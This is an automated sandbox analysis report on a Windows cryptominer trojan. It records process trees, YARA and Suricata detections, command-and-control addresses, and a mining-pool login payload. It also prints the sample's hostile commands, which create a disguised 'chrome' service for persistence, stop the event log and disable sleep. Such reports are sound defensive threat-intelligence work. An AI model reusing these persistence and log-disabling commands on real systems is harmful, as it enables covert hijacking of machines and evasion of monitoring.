Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe
Analysis ID:1542926
MD5:226eb2bbb97abbcabbd5bf08418cbe9c
SHA1:53c7485db2e1acb4b70a0a277d58e9ffec8a050d
SHA256:97e37eaf752b14313ee9aaa158f7028c092adeb4a902cb9618f58cffe29eeed2
Tags:CoinMinerexe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Suspect Svchost Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe (PID: 3940 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe" MD5: 226EB2BBB97ABBCABBD5BF08418CBE9C)
    • powercfg.exe (PID: 5064 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5744 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2488 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1344 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1136 cmdline: C:\Windows\system32\sc.exe delete "chrome" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6392 cmdline: C:\Windows\system32\sc.exe create "chrome" binpath= "C:\ProgramData\MicrosoftEdge\Edgee.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6560 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6852 cmdline: C:\Windows\system32\sc.exe start "chrome" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Edgee.exe (PID: 2664 cmdline: C:\ProgramData\MicrosoftEdge\Edgee.exe MD5: 226EB2BBB97ABBCABBD5BF08418CBE9C)
    • powercfg.exe (PID: 1076 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3612 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5744 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4600 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 4040 cmdline: svchost.exe MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x36fc08:$a1: mining.set_target
      • 0x361e30:$a2: XMRIG_HOSTNAME
      • 0x3647a8:$a3: Usage: xmrig [OPTIONS]
      • 0x361e08:$a4: XMRIG_VERSION
      Process Memory Space: svchost.exe PID: 4040JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        Process Memory Space: svchost.exe PID: 4040MacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x73317:$a1: mining.set_target
        • 0x6fa3f:$a2: XMRIG_HOSTNAME
        • 0x70831:$a3: Usage: xmrig [OPTIONS]
        • 0x6fa20:$a4: XMRIG_VERSION
        SourceRuleDescriptionAuthorStrings
        27.2.svchost.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          27.2.svchost.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x370008:$a1: mining.set_target
          • 0x362230:$a2: XMRIG_HOSTNAME
          • 0x364ba8:$a3: Usage: xmrig [OPTIONS]
          • 0x362208:$a4: XMRIG_VERSION
          27.2.svchost.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
          • 0x3b5761:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
          27.2.svchost.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
          • 0x3b5fd8:$s1: %s/%s (Windows NT %lu.%lu
          • 0x3b9600:$s3: \\.\WinRing0_
          • 0x3671a8:$s4: pool_wallet
          • 0x3615d8:$s5: cryptonight
          • 0x3615e8:$s5: cryptonight
          • 0x3615f8:$s5: cryptonight
          • 0x361608:$s5: cryptonight
          • 0x361620:$s5: cryptonight
          • 0x361630:$s5: cryptonight
          • 0x361640:$s5: cryptonight
          • 0x361658:$s5: cryptonight
          • 0x361668:$s5: cryptonight
          • 0x361680:$s5: cryptonight
          • 0x361698:$s5: cryptonight
          • 0x3616a8:$s5: cryptonight
          • 0x3616b8:$s5: cryptonight
          • 0x3616c8:$s5: cryptonight
          • 0x3616e0:$s5: cryptonight
          • 0x3616f8:$s5: cryptonight
          • 0x361708:$s5: cryptonight
          • 0x361718:$s5: cryptonight

          Change of critical system settings

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe, ParentProcessId: 3940, ParentProcessName: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5064, ProcessName: powercfg.exe

          System Summary

          barindex
          Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\MicrosoftEdge\Edgee.exe, ParentImage: C:\ProgramData\MicrosoftEdge\Edgee.exe, ParentProcessId: 2664, ParentProcessName: Edgee.exe, ProcessCommandLine: svchost.exe, ProcessId: 4040, ProcessName: svchost.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\MicrosoftEdge\Edgee.exe, ParentImage: C:\ProgramData\MicrosoftEdge\Edgee.exe, ParentProcessId: 2664, ParentProcessName: Edgee.exe, ProcessCommandLine: svchost.exe, ProcessId: 4040, ProcessName: svchost.exe
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "chrome" binpath= "C:\ProgramData\MicrosoftEdge\Edgee.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "chrome" binpath= "C:\ProgramData\MicrosoftEdge\Edgee.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe, ParentProcessId: 3940, ParentProcessName: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "chrome" binpath= "C:\ProgramData\MicrosoftEdge\Edgee.exe" start= "auto", ProcessId: 6392, ProcessName: sc.exe
          Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\MicrosoftEdge\Edgee.exe, ParentImage: C:\ProgramData\MicrosoftEdge\Edgee.exe, ParentProcessId: 2664, ParentProcessName: Edgee.exe, ProcessCommandLine: svchost.exe, ProcessId: 4040, ProcessName: svchost.exe

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe, ParentProcessId: 3940, ParentProcessName: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 6560, ProcessName: sc.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-26T22:32:03.575000+020020479282Crypto Currency Mining Activity Detected192.168.2.4615951.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-26T22:32:05.503960+020020510042Crypto Currency Mining Activity Detected192.168.2.44973183.217.209.23580TCP
          2024-10-26T22:33:04.673917+020020510042Crypto Currency Mining Activity Detected192.168.2.45553883.217.209.23580TCP
          2024-10-26T22:34:05.476290+020020510042Crypto Currency Mining Activity Detected192.168.2.45577183.217.209.23580TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-26T22:32:03.575000+020028269302Crypto Currency Mining Activity Detected192.168.2.449730141.94.96.713333TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeReversingLabs: Detection: 78%
          Source: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeReversingLabs: Detection: 81%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.4% probability

          Bitcoin Miner

          barindex
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 27.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4040, type: MEMORYSTR
          Source: global trafficTCP traffic: 192.168.2.4:49730 -> 141.94.96.71:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4335mezgwwsmbw161uqp6waqyxztrvxwsbpkzpxtxxah4mtoxxbierhgbab8xhdzaemkwwvnp49wwk5ribj37ak2azkaekr","pass":"cw","agent":"xmrig/6.21.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
          Source: svchost.exe, 0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: svchost.exeString found in binary or memory: cryptonight/0
          Source: svchost.exe, 0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
          Source: svchost.exe, 0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: svchost.exe, 0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: svchost.exe, 0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: Edgee.exe, 00000011.00000003.1727656008.000001D6C0E60000.00000004.00000001.00020000.00000000.sdmp, egfvwbuzpbvz.sys.17.dr
          Source: global trafficTCP traffic: 192.168.2.4:49730 -> 141.94.96.71:3333
          Source: Joe Sandbox ViewIP Address: 141.94.96.71 141.94.96.71
          Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
          Source: Joe Sandbox ViewASN Name: INF-NET-ASRU INF-NET-ASRU
          Source: Network trafficSuricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.4:61595 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.4:49731 -> 83.217.209.235:80
          Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.4:55538 -> 83.217.209.235:80
          Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.4:55771 -> 83.217.209.235:80
          Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49730 -> 141.94.96.71:3333
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: pool.supportxmr.com
          Source: unknownHTTP traffic detected: POST /yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 482Content-Type: application/jsonHost: 83.217.209.235User-Agent: cpp-httplib/0.12.6
          Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzx
          Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.1729543619.000001693E06B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2979959714.000001693E083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php
          Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php--c
          Source: svchost.exe, 0000001B.00000002.2979959714.000001693E083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpI
          Source: svchost.exe, 0000001B.00000003.1729543619.000001693E06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpwvr
          Source: svchost.exe, 0000001B.00000002.2979959714.000001693E083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpx
          Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxxhcx
          Source: Edgee.exe, 00000011.00000003.1727656008.000001D6C0E60000.00000004.00000001.00020000.00000000.sdmp, egfvwbuzpbvz.sys.17.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
          Source: Edgee.exe, 00000011.00000003.1727656008.000001D6C0E60000.00000004.00000001.00020000.00000000.sdmp, egfvwbuzpbvz.sys.17.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
          Source: Edgee.exe, 00000011.00000003.1727656008.000001D6C0E60000.00000004.00000001.00020000.00000000.sdmp, egfvwbuzpbvz.sys.17.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
          Source: Edgee.exe, 00000011.00000003.1727656008.000001D6C0E60000.00000004.00000001.00020000.00000000.sdmp, egfvwbuzpbvz.sys.17.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
          Source: svchost.exe, 0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

          System Summary

          barindex
          Source: 27.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 27.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 27.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 4040, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeCode function: 0_2_00007FF64FE01394 NtAllocateVirtualMemory,0_2_00007FF64FE01394
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeCode function: 17_2_00007FF6D96D1394 NtSetCachedSigningLevel,17_2_00007FF6D96D1394
          Source: C:\Windows\System32\conhost.exeCode function: 23_2_0000000140001394 NtCreateMutant,23_2_0000000140001394
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeFile created: C:\Windows\TEMP\egfvwbuzpbvz.sysJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeCode function: 0_2_00007FF64FE03B500_2_00007FF64FE03B50
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeCode function: 17_2_00007FF6D96D3B5017_2_00007FF6D96D3B50
          Source: C:\Windows\System32\conhost.exeCode function: 23_2_000000014000317023_2_0000000140003170
          Source: C:\Windows\System32\conhost.exeCode function: 23_2_00000001400026E023_2_00000001400026E0
          Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\egfvwbuzpbvz.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeCode function: String function: 00007FF6D96D1394 appears 32 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeCode function: String function: 00007FF64FE01394 appears 32 times
          Source: 27.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 27.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 27.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: Process Memory Space: svchost.exe PID: 4040, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: egfvwbuzpbvz.sys.17.drBinary string: \Device\WinRing0_1_2_0
          Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@40/2@1/2
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3140:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1852:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1344:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4048:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5428:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3808:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1852:120:WilError_03
          Source: C:\Windows\System32\svchost.exeMutant created: \BaseNamedObjects\Global\wvryikmmhskmhxzl
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2316:120:WilError_03
